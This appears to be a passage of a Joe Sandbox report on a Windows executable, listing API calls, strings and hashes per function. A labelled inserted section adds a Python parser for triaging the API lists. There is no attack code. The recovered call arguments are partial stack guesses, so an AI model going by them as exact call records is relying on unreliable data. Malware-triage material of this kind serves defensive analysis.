                                        • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                        • API String ID: 2644799563-3298887752
                                        • Opcode ID: 5f94ec6d022925d09440f443d2432db7e88ded7e8d7f6387100c9d09c11349bf
                                        • Instruction ID: 1d71b67b76000acb93ca38eb698cd744c8874610dd7055b0933940ea77b6faf5
                                        • Opcode Fuzzy Hash: 5f94ec6d022925d09440f443d2432db7e88ded7e8d7f6387100c9d09c11349bf
                                        • Instruction Fuzzy Hash: 73F180B1425288DBCF20EFA4DC49BDE3BA9BF06304F604119F90A9B691DF709669CF51

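The API lists in these function records are the part of the listing worth reading once the graphs are stripped away, but scanning them by eye across hundreds of functions is slow. What follows is an added example, not part of the Joe Sandbox report and not code from any tool it describes: a small Python parser for the "APIName.MODULE(args), ref: ADDRESS" bullet form used above, with two checks a triager typically wants (which names a function resolves at run time through GetProcAddress, and whether a given call sequence such as open file, read, compare string occurs in call-site address order) plus a decoder that names the numeric CreateFileW arguments. The sample lines are copied from the listings above (the "Part of subcall function" line is borrowed from a third record to exercise that form). The argument values are whatever the sandbox recovered from the stack: a "?" is an argument it could not recover, and CreateFileW is printed with more than its seven real parameters, so the decoder treats them as hints, not ground truth. The regular expression and the "eight hex digits means a number" heuristic are this example's own assumptions; the Windows constants are the documented ones.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input, copied from the function listings above in Joe
# Sandbox's "APIName.MODULE(args), ref: ADDRESS" form (subsets, not full lists).
RUNTIME_CHECK = """\
• GetModuleHandleW.KERNEL32(kernel32,D946AC94), ref: 00286DC7
• GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00286DD9
• GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00286E03
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002870CA
• ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 002870FF
• CloseHandle.KERNEL32(00000000), ref: 00287187
• CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 002871F8
• AllocConsole.KERNEL32 ref: 0028735E
• WriteConsoleW.KERNEL32(00000000), ref: 00287396
• Sleep.KERNEL32(00002710), ref: 002873A1
• ExitProcess.KERNEL32 ref: 002873B7
  • Part of subcall function 00286C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
"""
SET_FILE_TIME = """\
• CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,D946AC94,?,?,00000000,?,?,00000000,002A9E6B,000000FF), ref: 0027E248
• SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0027E346
"""

# Assumed line shape (this example's own regex): optional bullet, optional
# "Part of subcall function X:" prefix, API.MODULE, optional (args), ", ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$"
)
# Heuristic: the sandbox prints numeric arguments as exactly eight hex digits.
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                 # raw argument strings; "?" = not recovered
    ref: int                        # address of the call site
    subcall_of: Optional[str] = None  # set for "Part of subcall function X" lines


def parse_api_lines(text):
    """Parse the bullet list into ApiCall records, sorted by call-site address."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        sub, api, module, args, ref = m.groups()
        calls.append(ApiCall(api, module, args.split(",") if args else [],
                             int(ref, 16), sub))
    return sorted(calls, key=lambda c: c.ref)


def dynamic_imports(calls):
    """Names resolved at run time: the second GetProcAddress argument when it is
    a string rather than an ordinal/hex literal."""
    return [c.args[1] for c in calls
            if c.api == "GetProcAddress" and len(c.args) >= 2
            and not HEX_RE.match(c.args[1])]


def has_chain(calls, *apis):
    """True if the APIs occur in this order at increasing call-site addresses,
    counting only the function's own direct calls (subcall lines are skipped)."""
    want = list(apis)
    for c in calls:
        if c.subcall_of is None and want and c.api == want[0]:
            want.pop(0)
    return not want


# Documented Win32 constants for the CreateFileW parameters.
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
FLAGS = {0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
         0x02000000: "FILE_FLAG_BACKUP_SEMANTICS", 0x80: "FILE_ATTRIBUTE_NORMAL"}


def _num(s):
    return int(s, 16) if HEX_RE.match(s) else None


def _bits(value, table):
    if value is None:
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)          # bits without a name stay as hex
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names) or "0"


def decode_createfile(call):
    """Name the numeric arguments of a CreateFileW call. The sandbox prints stack
    slots beyond the seven real parameters, so only the first seven are used."""
    if call.api != "CreateFileW" or len(call.args) < 7:
        raise ValueError("not a complete CreateFileW call")
    a = call.args
    disp = _num(a[4])
    return {
        "access": _bits(_num(a[1]), ACCESS),
        "share": _bits(_num(a[2]), SHARE),
        "disposition": "?" if disp is None else DISPOSITION.get(disp, f"0x{disp:X}"),
        "flags": _bits(_num(a[5]), FLAGS),
    }


if __name__ == "__main__":
    calls = parse_api_lines(RUNTIME_CHECK)
    print("run-time resolved:", dynamic_imports(calls))
    print("open/read/compare chain:", has_chain(calls, "CreateFileW", "ReadFile", "CompareStringW"))
    for c in calls + parse_api_lines(SET_FILE_TIME):
        if c.api == "CreateFileW":
            print(f"{c.ref:08X} CreateFileW", decode_createfile(c))
```

Run it as-is and it reports the two names resolved through GetProcAddress in the first function, confirms the file-open, read, CompareStringW sequence, and decodes the two CreateFileW calls: GENERIC_READ / FILE_SHARE_READ / OPEN_EXISTING for the first, and OPEN_EXISTING with FILE_FLAG_SEQUENTIAL_SCAN (0x08000000, not FILE_FLAG_BACKUP_SEMANTICS, which is 0x02000000) for the one that precedes SetFileTime. Feed it any other record on this page by pasting its bullet lines into a string.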
                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00290678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00290689
                                          • Part of subcall function 00290678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0029069A
                                          • Part of subcall function 00290678: IsDialogMessageW.USER32(00010414,?), ref: 002906AE
                                          • Part of subcall function 00290678: TranslateMessage.USER32(?), ref: 002906BC
                                          • Part of subcall function 00290678: DispatchMessageW.USER32(?), ref: 002906C6
                                        • GetDlgItem.USER32(00000068,00000000), ref: 00293595
                                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,0028FD20,00000001,?,?), ref: 002935BA
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 002935C9
                                        • SendMessageW.USER32(00000000,000000C2,00000000,002AC6C8), ref: 002935D7
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 002935F1
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0029360B
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0029364F
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00293662
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00293675
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0029369C
                                        • SendMessageW.USER32(00000000,000000C2,00000000,002AC860), ref: 002936AB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: a818c80a9ca79e7b8619caf2b847e301b0adb9117a05e6a671e45ad896c77fd9
                                        • Instruction ID: 8de7e5f3109386ec3b38c8056a4af97aa8e7aaa9f1c02bb62e34f29f75e0a0d0
                                        • Opcode Fuzzy Hash: a818c80a9ca79e7b8619caf2b847e301b0adb9117a05e6a671e45ad896c77fd9
                                        • Instruction Fuzzy Hash: 4131D071249700BFE310DF21EC49F6B7BECEF46700F040518F96596190DBA4A9448FAA

                                        Control-flow Graph

                                        Control-flow graph of the function at 0x2938A0 (the rendered graph and its executed/not-executed colouring are omitted; the call sites it contains are listed under APIs below).
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 002938A7
                                        • ShellExecuteExW.SHELL32(?), ref: 00293AA4
                                        • IsWindowVisible.USER32(?), ref: 00293ACF
                                        • ShowWindow.USER32(?,00000000), ref: 00293ADD
                                        • WaitForInputIdle.USER32(?,000007D0), ref: 00293AED
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00293B0F
                                        • CloseHandle.KERNEL32(?), ref: 00293B33
                                        • ShowWindow.USER32(?,00000001), ref: 00293B76
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                        • String ID: .exe$.inf$\*
                                        • API String ID: 3208621885-4212905900
                                        • Opcode ID: e2eac52a878a106bc1aa4eb1518d34011f430ac7132df70a396747ba363dbc4b
                                        • Instruction ID: 53e494eeff1f5530d34266842b38b3ec848fcf4ed5f04d5f3717575054495bd5
                                        • Opcode Fuzzy Hash: e2eac52a878a106bc1aa4eb1518d34011f430ac7132df70a396747ba363dbc4b
                                        • Instruction Fuzzy Hash: ACB1DD31A20259DFDF21DF64D898BEDB7B5FF44310F248119E844A7290DBB0AEA6CB50

                                        Control-flow Graph

                                        Control-flow graph of the function at 0x289556 (the rendered graph and its executed/not-executed colouring are omitted; this record lists no direct API calls).
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: Lc+$Lc+$Lc+$Lc+
                                        • API String ID: 431132790-1939725009
                                        • Opcode ID: e3578e82fdeb3ee18e23a2277c695d1ce936d8404198628debcaeb8fb13f51ac
                                        • Instruction ID: 41ca5c6155453f5871e550e18a233b22b51b3ce1eb4b1413aa471ac781d99463
                                        • Opcode Fuzzy Hash: e3578e82fdeb3ee18e23a2277c695d1ce936d8404198628debcaeb8fb13f51ac
                                        • Instruction Fuzzy Hash: 918158B99363168FDB24FF64C885B7AB7E8AF41300F0C092EE455971C1E7B499A48B91

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00286C5E: __EH_prolog3_GS.LIBCMT ref: 00286C65
                                          • Part of subcall function 00286C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
                                        • OleInitialize.OLE32(00000000), ref: 0028F4ED
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028F524
                                        • SHGetMalloc.SHELL32(002C532C), ref: 0028F52E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                        • String ID: riched20.dll$3Ro
                                        • API String ID: 2446841611-3613677438
                                        • Opcode ID: 1a002fa5d4f2135b6c3fe69cd8980b5d2d9d72212f7ed55d07560830997f55dd
                                        • Instruction ID: 0375b7904521396cf85161f5c0da45543c9b2ff8fbbef70472741ea043f865ac
                                        • Opcode Fuzzy Hash: 1a002fa5d4f2135b6c3fe69cd8980b5d2d9d72212f7ed55d07560830997f55dd
                                        • Instruction Fuzzy Hash: 2FF0F9B5D00219ABCB10AF99DC4DDEEFBFCEF95700F00405AE415E2251DBB856558FA1

                                        Control-flow Graph

                                        Control-flow graph of the function at 0x27E180 (the rendered graph and its executed/not-executed colouring are omitted; the call sites it contains are listed under APIs below).
                                        APIs
                                        • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,D946AC94,?,?,00000000,?,?,00000000,002A9E6B,000000FF), ref: 0027E248
                                        • GetLastError.KERNEL32(?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0027E25A
                                        • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,002A9E6B,000000FF,?,00000011), ref: 0027E2A6
                                        • GetLastError.KERNEL32(?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 0027E2AF
                                        • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,002A9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 0027E346
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast$Time
                                        • String ID:
                                        • API String ID: 1999340476-0
                                        • Opcode ID: de99ae3af585e7b011a7c121cfb6741e91989f08fa6485b2dfc47f5400b5942d
                                        • Instruction ID: 4d7a511a0a21f833c346f955f2b862930bc3c5eea5af6708a22999c80ada42d5
                                        • Opcode Fuzzy Hash: de99ae3af585e7b011a7c121cfb6741e91989f08fa6485b2dfc47f5400b5942d
                                        • Instruction Fuzzy Hash: B261AE7092024ADFDF24CF64D885BEE7BA8FF09314F208259F91997281D7749964CBA4

                                        Control-flow Graph

                                        Control-flow graph of the function at 0x2874EC (the rendered graph and its executed/not-executed colouring are omitted; the call sites it contains are listed under APIs below).
                                        APIs
                                          • Part of subcall function 002877CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,002773B8), ref: 002877E1
                                          • Part of subcall function 002877CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,002773B8), ref: 002877F5
                                        • ReleaseSemaphore.KERNEL32(?,00000040,00000000,D946AC94,?,?,00000001,00000000,002AA603,000000FF,?,002890B9,?,?,00275630,?), ref: 0028752A
                                        • CloseHandle.KERNELBASE(?,?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?), ref: 00287544
                                        • DeleteCriticalSection.KERNEL32(?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 0028755D
                                        • CloseHandle.KERNEL32(?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00287569
                                        • CloseHandle.KERNEL32(?,?,002890B9,?,?,00275630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00287575
                                          • Part of subcall function 002875ED: WaitForSingleObject.KERNEL32(?,000000FF,0028770A,?,?,0028777F,?,?,?,?,?,00287769), ref: 002875F3
                                          • Part of subcall function 002875ED: GetLastError.KERNEL32(?,?,0028777F,?,?,?,?,?,00287769), ref: 002875FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                        • String ID:
                                        • API String ID: 1868215902-0
                                        • Opcode ID: c4e778bf1df741b0f28b74f4f6798cc6280efa50d943e4860bb012e2e229ae2a
                                        • Instruction ID: 876223270e4699ecbff15e090722147ef183f9e99e4f3f5b91bd7a364f70fa02
                                        • Opcode Fuzzy Hash: c4e778bf1df741b0f28b74f4f6798cc6280efa50d943e4860bb012e2e229ae2a
                                        • Instruction Fuzzy Hash: 9511C476004704EFD7229F64EC88FC6FBA9FB09710F50492AF556921A0CF75A954CB50

                                        Control-flow Graph

                                        Control-flow graph of the function at 0x290678 (the rendered graph and its executed/not-executed colouring are omitted; the call sites it contains are listed under APIs below).
                                        APIs
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00290689
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0029069A
                                        • IsDialogMessageW.USER32(00010414,?), ref: 002906AE
                                        • TranslateMessage.USER32(?), ref: 002906BC
                                        • DispatchMessageW.USER32(?), ref: 002906C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 1266772231-0
                                        • Opcode ID: 9048cc592297e034cd0b6ccc45c3ec0680426f35635f16a729397c372eb6c7cd
                                        • Instruction ID: 332bb2e08735ea4d7479f807eb33b9f7d3cc5e0c37b63f023b18d925442f55ac
                                        • Opcode Fuzzy Hash: 9048cc592297e034cd0b6ccc45c3ec0680426f35635f16a729397c372eb6c7cd
                                        • Instruction Fuzzy Hash: E9F0D0B191622EAB8F20AFE2EC4CDDB7FBCEE452517404415F516D2050E724D515CBB0

                                        Control-flow Graph

                                        control_flow_graph 1227 292813-292845 call 277673 1230 29284a-292850 1227->1230 1231 292847 1227->1231 1232 292abd 1230->1232 1233 292856-29285b 1230->1233 1231->1230 1236 292abf-292ac3 1232->1236 1234 29285d 1233->1234 1235 292860-29286e 1233->1235 1234->1235 1237 292870-29287c 1235->1237 1238 292896 1235->1238 1239 292ace-292ad2 1236->1239 1240 292ac5-292ac8 1236->1240 1237->1238 1241 29287e 1237->1241 1242 292899-29289c 1238->1242 1244 292af7 1239->1244 1245 292ad4-292ad7 1239->1245 1243 292aca-292acc 1240->1243 1240->1244 1246 292884-292888 1241->1246 1247 2928a2-2928a7 1242->1247 1248 292ab7 1242->1248 1249 292ada-292af2 call 277673 call 2938a0 1243->1249 1252 2934ad-2934e9 call 2758cb 1244->1252 1245->1244 1250 292ad9 1245->1250 1253 29288e-292894 1246->1253 1254 2929f0-2929f2 1246->1254 1255 2928a9 1247->1255 1256 2928ac-2928d7 call 29acee call 271afc 1247->1256 1248->1232 1249->1244 1250->1249 1253->1238 1253->1246 1254->1238 1258 2929f8-2929fc 1254->1258 1255->1256 1256->1252 1266 2928dd-2928e1 1256->1266 1258->1242 1267 2928e3 1266->1267 1268 2928e5-2928ec 1266->1268 1267->1268 1269 2928ee 1268->1269 1270 2928f1-29292f call 27120c call 28645a 1268->1270 1269->1270 1275 292935-292937 1270->1275 1276 29293d-29299f call 2714a7 call 27adaa call 271a66 call 2714a7 call 27adaa call 271a66 1275->1276 1277 292a01-292a07 1275->1277 1306 2929a1-2929a3 1276->1306 1307 2929a4-2929d2 call 2714a7 call 27adaa call 271a66 1276->1307 1278 292a09-292a24 1277->1278 1279 292a4e-292a68 1277->1279 1281 292a45-292a4d call 295726 1278->1281 1282 292a26-292a3f call 2719a9 1278->1282 1284 292a6a-292a85 1279->1284 1285 292aaf-292ab5 1279->1285 1281->1279 1282->1281 1286 292a87-292aa0 call 2719a9 1284->1286 1287 292aa6-292aae call 295726 1284->1287 1285->1236 1286->1287 1287->1285 1306->1307 1314 2929d4-2929d6 1307->1314 1315 2929d7-2929eb call 28645a 1307->1315 1314->1315 1315->1275
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: HIDE$MAX$MIN
                                        • API String ID: 176396367-2426493550
                                        • Opcode ID: c238699ac1cd551dd50e44b6fc1578e1283379e062d495db0ba9075e562d3461
                                        • Instruction ID: 013f627ba6c628f71449971ecec4d25e91394d4326e4d5575970d8dd70b861c9
                                        • Opcode Fuzzy Hash: c238699ac1cd551dd50e44b6fc1578e1283379e062d495db0ba9075e562d3461
                                        • Instruction Fuzzy Hash: E1A16C72C20269DECF25DFA4CC84ADDB7B8BF49310F14419AD409B7241EB705A99CFA0

                                        Control-flow Graph

                                        control_flow_graph 1318 28f2ce-28f2f7 GetClassNameW 1319 28f2f9-28f30e call 288da4 1318->1319 1320 28f31f-28f321 1318->1320 1326 28f31e 1319->1326 1327 28f310-28f31c FindWindowExW 1319->1327 1322 28f32c-28f338 call 295734 1320->1322 1323 28f323-28f326 SHAutoComplete 1320->1323 1323->1322 1326->1320 1327->1326
                                        APIs
                                        • GetClassNameW.USER32(?,?,00000050), ref: 0028F2EF
                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 0028F326
                                          • Part of subcall function 00288DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00280E3F,?,?,?,00000046,00281ECE,00000046,?,exe,00000046), ref: 00288DBA
                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0028F316
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                        • String ID: EDIT
                                        • API String ID: 4243998846-3080729518
                                        • Opcode ID: 6b91ffeed531b17fd6f112580fce94398592b15b0482727190bf13884ff7d82b
                                        • Instruction ID: c15c61faa53842fb9629d355c396d0d08cdd9a57d69f1b3307dcef7a94770466
                                        • Opcode Fuzzy Hash: 6b91ffeed531b17fd6f112580fce94398592b15b0482727190bf13884ff7d82b
                                        • Instruction Fuzzy Hash: 4CF0C835711219ABDB20AF24AD09FDFB7AC9F45B10F000065BA01E71C1DA70AA558B65

                                        Control-flow Graph

                                        control_flow_graph 1329 27e948-27e961 call 2957d8 1332 27e963-27e965 1329->1332 1333 27e96a-27e974 1329->1333 1334 27eaa6-27eaab call 295787 1332->1334 1335 27e976-27e983 GetStdHandle 1333->1335 1336 27e988 1333->1336 1337 27ea6f-27ea72 1335->1337 1338 27e98b-27e998 1336->1338 1337->1338 1340 27e9df-27e9f4 WriteFile 1338->1340 1341 27e99a-27e99e 1338->1341 1345 27e9f7-27e9f9 1340->1345 1343 27e9a0-27e9ab 1341->1343 1344 27e9ff-27ea03 1341->1344 1348 27e9af-27e9ce WriteFile 1343->1348 1349 27e9ad 1343->1349 1346 27ea9f-27eaa2 1344->1346 1347 27ea09-27ea0d 1344->1347 1345->1344 1345->1346 1346->1334 1347->1346 1350 27ea13-27ea25 call 279230 1347->1350 1348->1345 1351 27e9d0-27e9db 1348->1351 1349->1348 1355 27ea77-27ea9a call 2714a7 call 279653 call 271a66 1350->1355 1356 27ea27-27ea30 1350->1356 1351->1343 1353 27e9dd 1351->1353 1353->1345 1355->1346 1356->1338 1358 27ea36-27ea3a 1356->1358 1358->1338 1360 27ea40-27ea6c 1358->1360 1360->1337
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027E94F
                                        • GetStdHandle.KERNEL32(000000F5,0000002C,00282D28,?,?,?,?,00000000,0028ABB6,?,?,?,?,?,0028A80E,?), ref: 0027E978
                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0027E9BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmp
